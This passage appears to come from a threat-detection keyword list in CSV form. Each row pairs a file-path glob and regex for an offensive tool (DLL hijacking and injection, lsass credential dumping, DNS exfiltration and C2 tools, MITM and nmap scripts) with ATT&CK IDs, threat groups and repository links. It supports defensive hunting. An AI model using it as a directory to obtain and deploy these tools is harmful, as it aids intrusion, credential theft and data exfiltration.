"*/dllexploit.exe*",".{0,1000}\/dllexploit\.exe.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","6633"
"*/DllExport.bat*",".{0,1000}\/DllExport\.bat.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","6634"
"*/DLL-Hijack*",".{0,1000}\/DLL\-Hijack.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","N/A","10","10","147","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z","6635"
"*/dll-hijack-by-proxying.git*",".{0,1000}\/dll\-hijack\-by\-proxying\.git.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","1","N/A","N/A","7","5","498","103","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z","6636"
"*/DLLHijackTest.git*",".{0,1000}\/DLLHijackTest\.git.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","6637"
"*/DLLHound.git*",".{0,1000}\/DLLHound\.git.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","1","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","6638"
"*/DLLHound.ps1*",".{0,1000}\/DLLHound\.ps1.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","1","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","6639"
"*/dllinject.py*",".{0,1000}\/dllinject\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","6640"
"*/dllinjection_rs.exe*",".{0,1000}\/dllinjection_rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","6641"
"*/dll-installer.ps1*",".{0,1000}\/dll\-installer\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","6642"
"*/DllNotificationInjection.git*",".{0,1000}\/DllNotificationInjection\.git.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","6643"
"*/DllProxy.git*",".{0,1000}\/DllProxy\.git.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","N/A","1","17","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z","6644"
"*/dllproxy.nim*",".{0,1000}\/dllproxy\.nim.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","6645"
"*/DLL-Spoofer.git*",".{0,1000}\/DLL\-Spoofer\.git.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","1","N/A","N/A","9","1","60","7","2025-03-04T14:14:15Z","2023-10-18T14:34:38Z","6646"
"*/dns_grabber.*",".{0,1000}\/dns_grabber\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","6647"
"*/dns_spoof*",".{0,1000}\/dns_spoof.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","6648"
"*/dns2tcp.git*",".{0,1000}\/dns2tcp\.git.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","6649"
"*/dns2tcp/client/*",".{0,1000}\/dns2tcp\/client\/.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","#linux","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","6650"
"*/dns2tcp/common/*",".{0,1000}\/dns2tcp\/common\/.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","#linux","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","6651"
"*/dns2tcp/server*",".{0,1000}\/dns2tcp\/server.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","#linux","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","6652"
"*/dns-black-cat.git*",".{0,1000}\/dns\-black\-cat\.git.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","6653"
"*/dns-blacklist.nse*",".{0,1000}\/dns\-blacklist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6654"
"*/dns-brute.nse*",".{0,1000}\/dns\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6655"
"*/dns-cache-snoop.nse*",".{0,1000}\/dns\-cache\-snoop\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6656"
"*/dnscan.git*",".{0,1000}\/dnscan\.git.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","6657"
"*/dnscan.py*",".{0,1000}\/dnscan\.py.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","#linux","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","6658"
"*/dnscat.c*",".{0,1000}\/dnscat\.c.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","6659"
"*/dns-cat.exe*",".{0,1000}\/dns\-cat\.exe.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","6660"
"*/dnscat2.git*",".{0,1000}\/dnscat2\.git.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","N/A","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","6661"
"*/dns-check-zone.nse*",".{0,1000}\/dns\-check\-zone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6662"
"*/dnschef.exe*",".{0,1000}\/dnschef\.exe.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","6663"
"*/dnschef.ini*",".{0,1000}\/dnschef\.ini.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","#linux","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","6664"
"*/dnschef.log*",".{0,1000}\/dnschef\.log.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","#logfile #linux","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","6665"
"*/dnschef.py*",".{0,1000}\/dnschef\.py.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","6666"
"*/dnschef-ng.git*",".{0,1000}\/dnschef\-ng\.git.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","6667"
"*/dnschef-ng/*",".{0,1000}\/dnschef\-ng\/.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","6668"
"*/dns-client-subnet-scan.nse*",".{0,1000}\/dns\-client\-subnet\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6669"
"*/dnscnc.py*",".{0,1000}\/dnscnc\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","6670"
"*/dnscrypt-proxy*",".{0,1000}\/dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","6671"
"*/dnscrypt-proxy.git*",".{0,1000}\/dnscrypt\-proxy\.git.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","6672"
"*/dnsdump.py*",".{0,1000}\/dnsdump\.py.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","1","#linux","N/A","N/A","10","997","118","2025-04-04T09:28:20Z","2019-04-24T17:18:46Z","6673"
"*/DNSExfiltrator*",".{0,1000}\/DNSExfiltrator.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","6674"
"*/dnsExfiltrator.dll*",".{0,1000}\/dnsExfiltrator\.dll.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","6675"
"*/DNSExfiltrator.git*",".{0,1000}\/DNSExfiltrator\.git.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","6676"
"*/dnsexfiltrator.py*",".{0,1000}\/dnsexfiltrator\.py.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","6677"
"*/dns-fuzz.nse*",".{0,1000}\/dns\-fuzz\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6678"
"*/DNS-Hijacking.git*",".{0,1000}\/DNS\-Hijacking\.git.{0,1000}","offensive_tool_keyword","DNS-Hijacking","DNS Hijacking in UNIX/Linux System by using raw socket and pcap","T1496 - T1040 - T1071.004 - T1090","TA0040 - TA0002 - TA0009","N/A","Sea Turtle","Sniffing & Spoofing","https://github.com/DyeKuu/DNS-Hijacking","1","1","#linux","N/A","9","1","5","2","2020-05-31T23:03:34Z","2020-05-02T08:49:22Z","6679"
"*/dns-ip6-arpa-scan.nse*",".{0,1000}\/dns\-ip6\-arpa\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6680"
"*/dnskire.git*",".{0,1000}\/dnskire\.git.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","1","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","6681"
"*/dnskire.js*",".{0,1000}\/dnskire\.js.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","1","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","6682"
"*/dnskire.log*",".{0,1000}\/dnskire\.log.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","6683"
"*/dnskire/.ssh/*",".{0,1000}\/dnskire\/\.ssh\/.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","6684"
"*/dns-nsec3-enum.nse*",".{0,1000}\/dns\-nsec3\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6685"
"*/dns-nsec-enum.nse*",".{0,1000}\/dns\-nsec\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6686"
